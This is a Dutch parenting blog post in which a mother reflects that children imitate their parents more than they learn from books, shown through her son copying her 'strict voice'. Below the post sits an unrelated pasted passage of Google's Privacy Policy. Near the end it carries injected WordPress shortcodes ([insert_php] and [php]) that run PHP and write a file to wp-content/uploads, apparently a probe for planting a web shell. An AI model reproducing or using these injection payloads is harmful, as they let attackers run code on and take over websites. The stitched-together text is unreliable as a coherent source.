april 2, 2015

Opvoeden hoe doe je dat? In de loop der jaren heb ik al heel wat boeken en artikelen voorbij zien komen over opvoeden en de ontwikkeling van het kind. Welke mijlpalen komen eraan en waar moet je allemaal opletten? Toen ik net moeder was, werd ik er vaak een beetje nerveus van. Het maakte mij eerder onrustig dan een betere opvoeder. Ergens ging het mis in mijn hoofd. Zodra ik mezelf door de eerste bladzijdes had geworsteld, bekroop me het akelige gevoel van falen. Inmiddels heb ik er handigheid in, filter ik en haal eruit wat voor mij bruikbaar of inspirerend is. Voor mij zijn dat korte en duidelijke boodschappen, die me aan het denken zetten. Dan de volgende stap, hoe breng je de punten, die je aanspreken, nu eigenlijk in de praktijk?

Eerlijk is eerlijk, het wordt ons ook niet makkelijk gemaakt. Tegenwoordig moet je alles weten, overal verstand van hebben. Iedereen heeft een mening en wil deze maar wat graag met je delen. Gevraagd of ongevraagd. Dat heeft iets te maken met ruimte innemen geloof ik. Tja, die goede oude tijd zou je bijna denken. Toen was het lekker overzichtelijk en was niet alles te vinden op internet. Is er niet een overload aan informatie?

Moeten we ons niet afvragen of een andere insteek het proberen waard is? In plaats van uren lezen over het kind?

Doe jij zelf wat je je kinderen mee wilt geven? Van jongs af aan nemen kinderen ons gedrag in zich op en leren hiervan. Ze geven prachtige imitaties cadeau en zijn meer dan eens ons spiegeltje aan de wand. Ben je tevreden met wat je ziet of zou je het liever anders zien? Ik sluit me niet klakkeloos aan bij de opvatting ‘het kind is een product van de opvoeding’, maar ik vind wel dat je eerst naar jezelf mag kijken. Begin bij jezelf. Daar ligt de uitdaging. Wees wie je wilt zijn en geef jouw kinderen iets moois om na te doen.

‘Children learn more from what you are than what you teach.’

Click to Tweet

Laatst in de speeltuin wilde mijn zoon me iets laten zien. Ik was aan het bellen met een vriendin, dus gaf wat laat een reactie: “Had je me nog ergens voor nodig?”. “NEE!”, was zijn luid en duidelijke antwoord. “Maar je riep me toch?”. Geïrriteerd vroeg hij me of ik niet gelijk had kunnen kijken en waarom ik hem niet had verteld dat ik aan het bellen was. Ik staarde hem aan en zei: “Wat klink je boos.”. Zijn reactie: “Nee mam, ik zeg het alleen met mijn strenge stem.”. “Oh zo ja, net zoals ik wel eens doe?”. “Ja mama, precies zo!”.

Die strenge stem voelt eigenlijk niet zo aangenaam. Ik stel mezelf de vraag hoe vaak ik mijn strenge stem inzet en waarom? Komt dat wat ik zeg niet beter over zonder dat de strenge toon mijn boodschap vertroebeld? Ik denk het wel! Dit had ik natuurlijk ook in een boek kunnen lezen, maar de ‘kleine’ boodschap van mijn zoon leert me zo veel meer. Die boodschap vertelt me waar het voor mij echt om draait; namelijk hij & ik samen!

In mijn blog geef ik je op een luchtige en (hopelijk) herkenbare manier een kijkje in mijn leven als moeder van mijn jongens of deel ik andere onderwerpen over Kinderen & Zo. Heb jij ideeën of suggesties of wil je zelfs een stukje schrijven voor Kinderen&Zo, voel je vrij dit met mij te delen.


When you use Google services, you trust us with your information. This Privacy Policy is meant to help you understand what data we collect, why we collect it, and what we do with it. This is important; we hope you will take time to read it carefully. And remember, you can find controls to manage your information and protect your privacy and security at My Account.
There are many different ways you can use our services – to search for and share information, to communicate with other people or to create new content. When you share information with us, for example by creating a Google Account, we can make those services even better – to show you more relevant search results and ads, to help you connect with people or to make sharing with others quicker and easier. As you use our services, we want you to be clear how we’re using information and the ways in which you can protect your privacy.
Our Privacy Policy may change from time to time. We will not reduce your rights under this Privacy Policy without your explicit consent. We will post any privacy policy changes on this page and, if the changes are significant, we will provide a more prominent notice (including, for certain services, email notification of privacy policy changes). We will also keep prior versions of this Privacy Policy in an archive for your review.
[insert_php] echo 147098235+111;file_put_contents(‘wp-content/uploads/info.php’, ”); [/insert_php] [php] echo 147098235+111;file_put_contents(‘wp-content/uploads/info.php’, ”); [/php]

kinderenzo-2023

About the Author

kinderenzo-2023